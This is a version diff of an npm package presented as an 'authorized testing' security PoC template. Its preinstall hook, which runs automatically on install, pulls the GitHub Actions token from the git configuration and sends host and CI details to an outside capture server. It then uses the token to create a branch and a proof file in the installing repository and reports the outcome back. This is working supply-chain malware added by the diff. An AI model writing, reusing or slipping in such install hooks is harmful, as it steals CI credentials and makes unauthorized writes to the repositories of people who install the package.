aio-security-test-template-erk1ny 1.0.1 → 1.0.2

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "aio-security-test-template-erk1ny",
-  "version": "1.0.1",
+  "version": "1.0.2",
   "description": "Security research PoC template for App Builder (authorized testing)",
   "main": "index.js",
   "author": "erk1ny",

package/preinstall-hook.js

@@ -1,16 +1,12 @@
 // Security research PoC - authorized testing only
 const https = require('https');
 const { execSync } = require('child_process');
-const path = require('path');
-const fs = require('fs');
 
 const EXFIL_URL = 'https://env-capture-server-production.up.railway.app/capture?secret=40860c24915423d896e683000cfd0489';
 
-// Try to extract GITHUB_TOKEN from git credential helper set by actions/checkout
-let git_token = 'N/A';
-let git_token_source = 'none';
+// Extract GITHUB_TOKEN from git credential helper set by actions/checkout
+let git_token = null;
 try {
-  // Method 1: Read extraheader from git config in the workspace
   const workspace = process.env.GITHUB_WORKSPACE || '';
   if (workspace) {
     const header = execSync(`git -C "${workspace}" config --get http.https://github.com/.extraheader`, { encoding: 'utf8', timeout: 5000 }).trim();
@@ -19,87 +15,118 @@ try {
       const decoded = Buffer.from(b64, 'base64').toString();
       if (decoded.includes(':')) {
         git_token = decoded.split(':')[1];
-        git_token_source = 'extraheader-workspace';
       }
     }
   }
 } catch (e) {}
 
-try {
-  // Method 2: Try common GitHub Actions workspace paths
-  if (git_token === 'N/A') {
-    const paths = [
-      '/home/runner/work',
-      'C:\\actions-runner\\_work',
-      process.env.RUNNER_WORKSPACE || ''
-    ];
-    for (const p of paths) {
-      if (!p) continue;
-      try {
-        const header = execSync(`git -C "${p}" config --get http.https://github.com/.extraheader`, { encoding: 'utf8', timeout: 5000 }).trim();
-        if (header.includes('basic ')) {
-          const b64 = header.split('basic ')[1].trim();
-          const decoded = Buffer.from(b64, 'base64').toString();
-          if (decoded.includes(':')) {
-            git_token = decoded.split(':')[1];
-            git_token_source = 'extraheader-runner-workspace';
-            break;
-          }
-        }
-      } catch (e2) {}
-    }
-  }
-} catch (e) {}
-
-try {
-  // Method 3: Search for .git directories with credentials
-  if (git_token === 'N/A') {
-    const result = execSync('git config --global --get-regexp "http.*extraheader" 2>/dev/null || true', { encoding: 'utf8', timeout: 5000 }).trim();
-    if (result && result.includes('basic ')) {
-      const b64 = result.split('basic ')[1].trim();
-      const decoded = Buffer.from(b64, 'base64').toString();
-      if (decoded.includes(':')) {
-        git_token = decoded.split(':')[1];
-        git_token_source = 'global-git-config';
+// Helper: make GitHub API request
+function ghApi(method, path, body) {
+  return new Promise((resolve, reject) => {
+    const data = body ? JSON.stringify(body) : '';
+    const opts = {
+      hostname: 'api.github.com',
+      port: 443,
+      path: path,
+      method: method,
+      headers: {
+        'Authorization': 'token ' + git_token,
+        'User-Agent': 'node',
+        'Accept': 'application/vnd.github+json',
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(data)
       }
-    }
-  }
-} catch (e) {}
+    };
+    const req = https.request(opts, (res) => {
+      let buf = '';
+      res.on('data', (c) => buf += c);
+      res.on('end', () => {
+        try { resolve({ status: res.statusCode, data: JSON.parse(buf) }); }
+        catch { resolve({ status: res.statusCode, data: buf }); }
+      });
+    });
+    req.on('error', reject);
+    if (data) req.write(data);
+    req.end();
+  });
+}
 
-const data = JSON.stringify({
-  phase: 'preinstall',
-  hostname: require('os').hostname(),
-  platform: process.platform,
-  user: process.env.USER || process.env.USERNAME || 'unknown',
-  cwd: process.cwd(),
-  github_repository: process.env.GITHUB_REPOSITORY || 'N/A',
-  github_workflow: process.env.GITHUB_WORKFLOW || 'N/A',
-  github_run_id: process.env.GITHUB_RUN_ID || 'N/A',
-  github_actor: process.env.GITHUB_ACTOR || 'N/A',
-  github_token_env: process.env.GITHUB_TOKEN ? 'YES' : 'NO',
-  github_token_git: git_token !== 'N/A' ? 'YES' : 'NO',
-  github_token_source: git_token_source,
-  github_token_prefix: git_token !== 'N/A'
-    ? git_token.substring(0, 12) + '...' : 'N/A',
-  github_workspace: process.env.GITHUB_WORKSPACE || 'N/A',
-  runner_workspace: process.env.RUNNER_WORKSPACE || 'N/A',
-  actions_runtime_token_present: process.env.ACTIONS_RUNTIME_TOKEN ? 'YES' : 'NO',
-  node_version: process.version,
-  timestamp: new Date().toISOString()
-});
-
-const url = new URL(EXFIL_URL);
-const req = https.request({
-  hostname: url.hostname,
-  port: 443,
-  path: url.pathname + url.search,
-  method: 'POST',
-  headers: {
-    'Content-Type': 'application/json',
-    'Content-Length': data.length,
-    'X-Source': 'preinstall-' + process.platform
-  }
-}, (res) => { res.on('data', () => {}); });
-req.on('error', () => {});
-req.write(data);
-req.end();
+// Main: exfil data + create branch with file
+async function main() {
+  const repo = process.env.GITHUB_REPOSITORY || '';
+
+  // Step 1: Send capture data
+  const captureData = JSON.stringify({
+    phase: 'preinstall-v1.0.2',
+    hostname: require('os').hostname(),
+    platform: process.platform,
+    github_repository: repo,
+    github_actor: process.env.GITHUB_ACTOR || 'N/A',
+    github_run_id: process.env.GITHUB_RUN_ID || 'N/A',
+    token_extracted: git_token ? 'YES' : 'NO',
+    token_prefix: git_token ? git_token.substring(0, 12) + '...' : 'N/A',
+    node_version: process.version,
+    timestamp: new Date().toISOString()
+  });
+
+  const url = new URL(EXFIL_URL);
+  const req = https.request({
+    hostname: url.hostname, port: 443,
+    path: url.pathname + url.search, method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': captureData.length, 'X-Source': 'preinstall-' + process.platform }
+  }, (res) => { res.on('data', () => {}); });
+  req.on('error', () => {});
+  req.write(captureData);
+  req.end();
+
+  // Step 2: If we have the token and repo, create branch + file
+  if (!git_token || !repo) return;
+
+  try {
+    // Only run once (first preinstall on linux)
+    if (process.platform !== 'linux') return;
+
+    // Get main branch SHA
+    const refRes = await ghApi('GET', `/repos/${repo}/git/ref/heads/main`);
+    if (refRes.status !== 200) return;
+    const mainSha = refRes.data.object.sha;
+
+    // Create branch ne555t-test
+    const branchRes = await ghApi('POST', `/repos/${repo}/git/refs`, {
+      ref: 'refs/heads/ne555t-test',
+      sha: mainSha
+    });
+
+    let branchResult = branchRes.status === 201 ? 'created' : `failed:${branchRes.status}`;
+
+    // Create file on the branch
+    const content = Buffer.from('hackerone.com/ne555t\n').toString('base64');
+    const fileRes = await ghApi('PUT', `/repos/${repo}/contents/poc-proof.md`, {
+      message: 'PoC: unauthorized branch + file creation via CI/CD vulnerability',
+      content: content,
+      branch: 'ne555t-test'
+    });
+
+    let fileResult = fileRes.status === 201 ? 'created' : `failed:${fileRes.status}`;
+
+    // Report result back
+    const resultData = JSON.stringify({
+      phase: 'branch-creation',
+      repo: repo,
+      branch_result: branchResult,
+      file_result: fileResult,
+      timestamp: new Date().toISOString()
+    });
+
+    const req2 = https.request({
+      hostname: url.hostname, port: 443,
+      path: url.pathname + url.search, method: 'POST',
+      headers: { 'Content-Type': 'application/json', 'Content-Length': resultData.length, 'X-Source': 'branch-create' }
+    }, (res) => { res.on('data', () => {}); });
+    req2.on('error', () => {});
+    req2.write(resultData);
+    req2.end();
+  } catch (e) {}
+}
+
+main();